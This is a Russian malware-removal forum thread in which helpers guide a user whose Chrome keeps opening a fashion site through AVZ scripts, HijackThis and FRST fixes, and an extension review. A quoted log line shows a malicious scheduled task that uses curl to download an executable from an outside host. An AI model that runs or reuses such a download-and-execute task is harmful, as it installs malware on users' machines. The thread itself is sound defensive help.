Перейти к содержанию

В Google Chrome периодически открывается вкладка с непонятным сайтом


Рекомендуемые сообщения

Добрый времени суток!

 

С недавнего времени столкнулся в браузере с проблемой перехода на  один и тот же сайт на тему моды, хотя антивирус Касперского блокирует разные ссылки в разделе веб-антивируса. Пробовал разные программы для удаления вирусов но проблема не исчезла. Прикрепил логи.

 

P.S.- Заранее благодарен!

CollectionLog-2017.07.23-22.28.zip

Изменено пользователем valmlord
Ссылка на сообщение
Поделиться на другие сайты

Здравствуйте!

- Проведите эту процедуру. Полученную ссылку после загрузки карантина virusinfo_auto_имя_вашего_ПК.zip через данную форму напишите в своём в сообщении здесь.

Закройте все программы, временно выгрузите антивирус, файрволл и прочее защитное ПО.

Выполните скрипт в АВЗ (Файл - Выполнить скрипт):
 

begin
 ExecuteFile('net.exe', 'stop tcpip /y', 0, 15000, true);
 ClearQuarantineEx(true);
 QuarantineFile('C:\Users\korsh\AppData\Roaming\Microsoft\msi.exe', '');
 QuarantineFileF('C:\Users\korsh\AppData\Roaming\curl\', '*.exe, *.dll, *.sys, *.bat, *.vbs, *.ps1, *.js*, *.tmp*', true, '', 0, 0);
 DeleteFile('C:\Users\korsh\AppData\Roaming\Microsoft\msi.exe', '32');
 ExecuteFile('schtasks.exe', '/delete /TN "curl" /F', 0, 15000, true);
 ExecuteFile('schtasks.exe', '/delete /TN "MSI" /F', 0, 15000, true);
 DeleteFileMask('C:\Users\korsh\AppData\Roaming\curl\', '*', true);
 DeleteDirectory('C:\Users\korsh\AppData\Roaming\curl\');
 CreateQurantineArchive(GetAVZDirectory + 'quarantine.zip');
ExecuteSysClean;
 ExecuteWizard('SCU', 2, 3, true);
RebootWindows(true);
end.

После выполнения скрипта компьютер перезагрузится.

 - Файл quarantine.zip из папки AVZ отправьте по адресу newvirus@kaspersky.com
Полученный ответ сообщите здесь (с указанием номера KLAN)
 
Повторите логи по правилам. Для повторной диагностики запустите снова Autologger. Для повторной диагностики запустите снова Autologger.
Ссылка на сообщение
Поделиться на другие сайты

[KLAN-6563168774]

 

Процедуру выполнил.


Новые логи. Но по ссылке все равно переходит.

CollectionLog-2017.07.24-10.21.zip

Изменено пользователем valmlord
Ссылка на сообщение
Поделиться на другие сайты

"Пофиксите" в HijackThis:

O8 - Extra context menu item: Закачать ВСЕ при помощи Download Master - (no file)
O8 - Extra context menu item: Закачать при помощи Download Master - (no file)
O8 - Extra context menu item: Передать на удаленную закачку DM - (no file)
O9-32 - Extra button: (no name) - HKLM\..\{8DAE90AD-4583-4977-9DD4-4360F7A45C74} - (no file)
O21 - ShellIconOverlayIdentifiers: 00asw - {472083B0-C522-11CF-8763-00608CC02F24} - (no file)
O22 - Task (Ready): MSI - C:\Users\korsh\AppData\Roaming\Microsoft\msi.exe cnt=2 fts="Downloads\adobe_snr_patch_v2_0___.exe" (file missing)
O22 - Task (Ready): curl - C:\Users\korsh\AppData\Roaming\curl\curl_7_54.exe -f -L "http://amtomil.ru/f.exe" -o "C:\Users\korsh\AppData\Roaming\curl\curl.exe" (file missing)
O22 - Task (Ready): curls - C:\Users\korsh\AppData\Roaming\curl\curl.exe (file missing)

 

Скачайте Farbar Recovery Scan Tool и сохраните на Рабочем столе.

Примечание: необходимо выбрать версию, совместимую с Вашей операционной системой. Если Вы не уверены, какая версия подойдет для Вашей системы, скачайте обе и попробуйте запустить. Только одна из них запустится на Вашей системе.
Запустите программу. Когда программа запустится, нажмите Yes для соглашения с предупреждением.
Отметьте галочкой также "Shortcut.txt".

Нажмите кнопку Scan.
После окончания сканирования будут созданы отчеты FRST.txt, Addition.txt, Shortcut.txt в той же папке, откуда была запущена программа. Прикрепите отчеты к своему следующему сообщению.
 

Ссылка на сообщение
Поделиться на другие сайты
  • Отключите до перезагрузки антивирус.
  • Выделите следующий код:
    Start::
    CreateRestorePoint:
    Task: {04FE8142-078C-4C8D-A6B3-E71B3AD58CC2} - System32\Tasks\curls => C:\Users\korsh\AppData\Roaming\curl\curl.exe <==== ATTENTION
    Task: {2DA78775-D5A1-4FF5-9F41-1002F45FB790} - System32\Tasks\S-1-5-21-622461763-1730611795-3261267339-1001\DataSenseLiveTileTask => C:\WINDOWS\System32\DataUsageLiveTileTask.exe [2017-03-18] (Microsoft Corporation)
    Task: {54FD84DD-93B6-412C-8CE7-61652B16E327} - System32\Tasks\MSI => C:\Users\korsh\AppData\Roaming\Microsoft\msi.exe
    2017-07-21 15:25 - 2017-07-21 15:25 - 00000000 ____D C:\Users\korsh\AppData\Local\Tempzxpsignb2647fd6355e3a09
    2017-07-21 15:25 - 2017-07-21 15:25 - 00000000 ____D C:\Users\korsh\AppData\Local\Tempzxpsign1ff9e8ccadfb791b
    2017-07-21 15:23 - 2017-07-21 15:23 - 00000000 ____D C:\Users\korsh\AppData\Local\Tempzxpsignf98c59fb8aa73d65
    2017-07-21 15:23 - 2017-07-21 15:23 - 00000000 ____D C:\Users\korsh\AppData\Local\Tempzxpsignb0b5818e61bf0927
    2017-07-21 15:23 - 2017-07-21 15:23 - 00000000 ____D C:\Users\korsh\AppData\Local\Tempzxpsign9446595e6997269d
    2017-07-21 15:23 - 2017-07-21 15:23 - 00000000 ____D C:\Users\korsh\AppData\Local\Tempzxpsign45f445e1b114190a
    2017-07-18 15:16 - 2017-07-18 15:16 - 00000000 ____D C:\Users\korsh\AppData\Local\Tempzxpsigne9fa9aecd1457c7e
    2017-07-18 15:16 - 2017-07-18 15:16 - 00000000 ____D C:\Users\korsh\AppData\Local\Tempzxpsign98654afdbb435ff7
    2017-07-18 15:16 - 2017-07-18 15:16 - 00000000 ____D C:\Users\korsh\AppData\Local\Tempzxpsign2ffdbae189d060a6
    2017-07-18 15:15 - 2017-07-18 15:15 - 00000000 ____D C:\Users\korsh\AppData\Local\Tempzxpsign72fc4b4c331c5c09
    2017-07-18 15:15 - 2017-07-18 15:15 - 00000000 ____D C:\Users\korsh\AppData\Local\Tempzxpsign586c353c36e55591
    2017-07-18 13:34 - 2017-07-18 13:34 - 00000000 ____D C:\Users\korsh\AppData\Local\Tempzxpsign7f142479ecb18662
    2017-07-18 13:34 - 2017-07-18 13:34 - 00000000 ____D C:\Users\korsh\AppData\Local\Tempzxpsign7dd8d17cce6f39d6
    2017-07-18 13:27 - 2017-07-18 13:27 - 00000000 ____D C:\Users\korsh\AppData\Local\Tempzxpsigne844ae9662544afd
    2017-07-18 13:27 - 2017-07-18 13:27 - 00000000 ____D C:\Users\korsh\AppData\Local\Tempzxpsignc21941d5bd6e16fa
    2017-07-16 00:00 - 2017-07-16 00:00 - 00000000 ____D C:\Users\korsh\AppData\Local\Tempzxpsigncc347c9cda4ebc3c
    2017-07-16 00:00 - 2017-07-16 00:00 - 00000000 ____D C:\Users\korsh\AppData\Local\Tempzxpsign46fe240577c62dc2
    2017-07-16 00:00 - 2017-07-16 00:00 - 00000000 ____D C:\Users\korsh\AppData\Local\Tempzxpsign04e77205866ab10d
    2017-07-11 09:53 - 2017-07-11 09:53 - 00000000 ____D C:\Users\korsh\AppData\Local\Tempzxpsignaae2bc5cb51a03ad
    2017-07-11 09:53 - 2017-07-11 09:53 - 00000000 ____D C:\Users\korsh\AppData\Local\Tempzxpsign9ef3b70db1bad327
    2017-07-10 20:27 - 2017-07-10 20:27 - 00000000 ____D C:\Users\korsh\AppData\Local\Tempzxpsignc3e8eae2e0d34aae
    2017-07-10 20:26 - 2017-07-10 20:26 - 00000000 ____D C:\Users\korsh\AppData\Local\Tempzxpsign79a93fa63b208c2d
    2017-07-10 20:26 - 2017-07-10 20:26 - 00000000 ____D C:\Users\korsh\AppData\Local\Tempzxpsign260ff3c57ba639a0
    2017-07-04 09:19 - 2017-07-04 09:19 - 00000000 ____D C:\Users\korsh\AppData\Local\Tempzxpsignd594cc74dd597bec
    2017-07-04 09:19 - 2017-07-04 09:19 - 00000000 ____D C:\Users\korsh\AppData\Local\Tempzxpsignaeb44e4012ba6c33
    2017-07-04 09:19 - 2017-07-04 09:19 - 00000000 ____D C:\Users\korsh\AppData\Local\Tempzxpsign7f4e20de6fe7515e
    2017-07-02 18:01 - 2017-07-02 18:01 - 00000000 ____D C:\Users\korsh\AppData\Local\Tempzxpsignefe9c21f5b7d0e3c
    2017-07-02 18:01 - 2017-07-02 18:01 - 00000000 ____D C:\Users\korsh\AppData\Local\Tempzxpsign9c7a4c68c7345059
    2017-07-02 18:01 - 2017-07-02 18:01 - 00000000 ____D C:\Users\korsh\AppData\Local\Tempzxpsign705a1c5d19a57b0a
    2017-07-02 18:01 - 2017-07-02 18:01 - 00000000 ____D C:\Users\korsh\AppData\Local\Tempzxpsign6e0c021a84327464
    2017-06-30 15:26 - 2017-06-30 15:26 - 00000000 ____D C:\Users\korsh\AppData\Local\Tempzxpsignfcd99e10f5556339
    2017-06-30 15:26 - 2017-06-30 15:26 - 00000000 ____D C:\Users\korsh\AppData\Local\Tempzxpsigncb9814e63a9d1f48
    2017-06-30 12:26 - 2017-06-30 12:26 - 00000000 ____D C:\Users\korsh\AppData\Local\Tempzxpsign95ee08595d98b80d
    2017-06-30 12:26 - 2017-06-30 12:26 - 00000000 ____D C:\Users\korsh\AppData\Local\Tempzxpsign813e4e7fc63bf8db
    2017-06-30 12:26 - 2017-06-30 12:26 - 00000000 ____D C:\Users\korsh\AppData\Local\Tempzxpsign7b834b74203ecab4
    2017-06-30 12:26 - 2017-06-30 12:26 - 00000000 ____D C:\Users\korsh\AppData\Local\Tempzxpsign5e26b5a05b6d84eb
    2017-06-30 12:26 - 2017-06-30 12:26 - 00000000 ____D C:\Users\korsh\AppData\Local\Tempzxpsign412988fc9fcf7c18
    2017-06-30 12:21 - 2017-06-30 12:21 - 00000000 ____D C:\Users\korsh\AppData\Local\Tempzxpsigna02dfb9b2cb3be5c
    2017-06-30 12:20 - 2017-06-30 12:20 - 00000000 ____D C:\Users\korsh\AppData\Local\Tempzxpsigncd891ec1454d2864
    2017-06-30 12:20 - 2017-06-30 12:20 - 00000000 ____D C:\Users\korsh\AppData\Local\Tempzxpsign1fcbc461bcfc12f4
    2017-06-30 12:19 - 2017-06-30 12:19 - 00000000 ____D C:\Users\korsh\AppData\Local\Tempzxpsignfc08370a161c0e69
    2017-06-30 12:19 - 2017-06-30 12:19 - 00000000 ____D C:\Users\korsh\AppData\Local\Tempzxpsignc019c40d13fd2614
    2017-06-30 12:19 - 2017-06-30 12:19 - 00000000 ____D C:\Users\korsh\AppData\Local\Tempzxpsigna3617627162fbc7a
    2017-06-30 12:19 - 2017-06-30 12:19 - 00000000 ____D C:\Users\korsh\AppData\Local\Tempzxpsign3994bc82809fbda6
    2017-06-30 12:17 - 2017-06-30 12:17 - 00000000 ____D C:\Users\korsh\AppData\Local\Tempzxpsign8cfa1402eb65c4ba
    2017-06-30 12:17 - 2017-06-30 12:17 - 00000000 ____D C:\Users\korsh\AppData\Local\Tempzxpsign81d088a9745af97e
    2017-06-30 12:17 - 2017-06-30 12:17 - 00000000 ____D C:\Users\korsh\AppData\Local\Tempzxpsign7c283eb03c9a70a8
    2017-07-10 20:21 - 2017-07-15 23:19 - 0004910 _____ () C:\Program Files\Common Files\csdkConfiguratorLog.txt
    2017-07-18 13:32 - 2017-07-18 20:20 - 0000033 _____ () C:\Users\korsh\AppData\Roaming\AdobeWLCMCache.dat
    2017-06-30 11:19 - 2017-07-24 10:54 - 0000165 _____ () C:\Users\korsh\AppData\Roaming\sp_data.sys
    2017-07-21 17:10 - 2017-07-21 17:10 - 0000032 RSHOT () C:\Users\korsh\AppData\Local\t80.dat
    2017-06-30 01:59 - 2017-06-30 01:59 - 0000000 ____H () C:\ProgramData\DP45977C.lfl
    EmptyTemp:
    Reboot:
    End::
  • Скопируйте выделенный текст (правой кнопкой - Копировать).
  • Запустите FRST (FRST64) от имени администратора.
  • Нажмите Fix и подождите. Программа создаст лог-файл (Fixlog.txt). Прикрепите его к своему следующему сообщению.


Компьютер будет перезагружен автоматически.
 
Ссылка на сообщение
Поделиться на другие сайты

1) Проблема только в Хроме? Проверьте в других браузерах.

 

2) Эти расширения все знакомы?

 

CHR Extension: (Скачать музыку с Вконтакте (vk.com)) - C:\Users\korsh\AppData\Local\Google\Chrome\User Data\Default\Extensions\afkpfjljjhhonjehpkmgonimjjgaheap [2017-07-13]
CHR Extension: (Диск Google) - C:\Users\korsh\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf [2017-06-30]
CHR Extension: (Красоты) - C:\Users\korsh\AppData\Local\Google\Chrome\User Data\Default\Extensions\bbbelgoeoihcmnkgkeanmogncgkfichm [2017-06-30]
CHR Extension: (Tab Resize - split screen layouts) - C:\Users\korsh\AppData\Local\Google\Chrome\User Data\Default\Extensions\bkpenclhmiealbebdopglffmfdiilejc [2017-06-30]
CHR Extension: (YouTube) - C:\Users\korsh\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2017-06-30]
CHR Extension: (uDev - Web Developer Toolbar) - C:\Users\korsh\AppData\Local\Google\Chrome\User Data\Default\Extensions\deeboegbjcnfgidliakhpoapnpomphji [2017-06-30]
CHR Extension: (Tampermonkey) - C:\Users\korsh\AppData\Local\Google\Chrome\User Data\Default\Extensions\dhdgffkkebhmkfjojejmpbldmpobfkfo [2017-06-30]
CHR Extension: (Adobe Acrobat) - C:\Users\korsh\AppData\Local\Google\Chrome\User Data\Default\Extensions\efaidnbmnnnibpcajpcglclefindmkaj [2017-07-11]
CHR Extension: (Fontface Ninja) - C:\Users\korsh\AppData\Local\Google\Chrome\User Data\Default\Extensions\eljapbgkmlngdpckoiiibecpemleclhh [2017-06-30]
CHR Extension: (AdBlock) - C:\Users\korsh\AppData\Local\Google\Chrome\User Data\Default\Extensions\gighmmpiobklfepjocnamgkkbiglidom [2017-07-20]
CHR Extension: (Eye Dropper) - C:\Users\korsh\AppData\Local\Google\Chrome\User Data\Default\Extensions\hmdcmlfkchdmnmnmheododdhjedfccka [2017-07-22]
CHR Extension: (LiveReload) - C:\Users\korsh\AppData\Local\Google\Chrome\User Data\Default\Extensions\jnihajbhpnppcggbcgedagnkighmdlei [2017-06-30]
CHR Extension: (Speed Dial 2) - C:\Users\korsh\AppData\Local\Google\Chrome\User Data\Default\Extensions\jpfpebmajhhopeonhlcgidhclcccjcik [2017-06-30]
CHR Extension: (Бесплатный прокси-сервер VPN Hotspot Shield — разблокировка сайтов) - C:\Users\korsh\AppData\Local\Google\Chrome\User Data\Default\Extensions\nlbejmccbhkncgokjcmghpfloaajcffj [2017-07-22]
CHR Extension: (Платежная система Интернет-магазина Chrome) - C:\Users\korsh\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2017-06-30]
CHR Extension: (Checker Plus for Gmail™) - C:\Users\korsh\AppData\Local\Google\Chrome\User Data\Default\Extensions\oeopbcgkkoapgobdbedcemjljbihmemj [2017-07-24]
CHR Extension: (Visual Event) - C:\Users\korsh\AppData\Local\Google\Chrome\User Data\Default\Extensions\pbmmieigblcbldgdokdjpioljjninaim [2017-06-30]
CHR Extension: (Evernote Web Clipper) - C:\Users\korsh\AppData\Local\Google\Chrome\User Data\Default\Extensions\pioclpoplcdbaefihamjohnefbikjilc [2017-06-30]
CHR Extension: (Gmail) - C:\Users\korsh\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2017-06-30]
CHR Extension: (Chrome Media Router) - C:\Users\korsh\AppData\Local\Google\Chrome\User Data\Default\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm [2017-07-14]

Ссылка на сообщение
Поделиться на другие сайты

В других браузерах вроде не переходит.


CHR Extension: (Красоты) - C:\Users\korsh\AppData\Local\Google\Chrome\User Data\Default\Extensions\bbbelgoeoihcmnkgkeanmogncgkfichm [2017-06-30]

CHR Extension: (Chrome Media Router) - C:\Users\korsh\AppData\Local\Google\Chrome\User Data\Default\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm [2017-07-14]

 

Вот это не знаю.

Изменено пользователем valmlord
Ссылка на сообщение
Поделиться на другие сайты

 

 


CHR Extension: (Красоты) - C:\Users\korsh\AppData\Local\Google\Chrome\User Data\Default\Extensions\bbbelgoeoihcmnkgkeanmogncgkfichm [2017-06-30]
Вот это удалите через управление расширениями и проверьте проблему.
Ссылка на сообщение
Поделиться на другие сайты

У Google chrome в расширениях нету его в списках. Можно папку с ним через проводник удалить?

 

Жесть какая-то, первый раз сталкиваюсь с таким вирусом неудоляемым).

Изменено пользователем valmlord
Ссылка на сообщение
Поделиться на другие сайты

Присоединяйтесь к обсуждению

Вы можете написать сейчас и зарегистрироваться позже. Если у вас есть аккаунт, авторизуйтесь, чтобы опубликовать от имени своего аккаунта.

Гость
Ответить в этой теме...

×   Вставлено с форматированием.   Вставить как обычный текст

  Разрешено использовать не более 75 эмодзи.

×   Ваша ссылка была автоматически встроена.   Отображать как обычную ссылку

×   Ваш предыдущий контент был восстановлен.   Очистить редактор

×   Вы не можете вставлять изображения напрямую. Загружайте или вставляйте изображения по ссылке.

×
×
  • Создать...